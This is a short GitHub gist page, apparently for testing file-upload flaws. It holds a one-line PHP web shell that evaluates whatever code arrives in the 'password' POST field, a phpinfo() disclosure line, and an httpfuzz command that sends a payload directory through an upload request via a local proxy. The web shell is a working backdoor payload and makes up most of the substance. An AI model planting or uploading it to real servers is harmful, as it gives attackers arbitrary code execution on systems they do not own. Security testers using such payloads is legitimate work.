Skip to content

Instantly share code, notes, and snippets.

@JonCooperWorks
Last active September 26, 2020 02:46
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save JonCooperWorks/87b1f52fdbb4c376ea33a8ea4de5ef44 to your computer and use it in GitHub Desktop.
Save JonCooperWorks/87b1f52fdbb4c376ea33a8ea4de5ef44 to your computer and use it in GitHub Desktop.
<?php @eval($_POST['password']);?>
<?php echo phpinfo(); ?>
httpfuzz \
--seed-request uploadPOST.request \
--delay-ms 50 \
--proxy-url http://localhost:8080 \
--multipart-file-name uploaded \
--payload-dir ./payloads
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment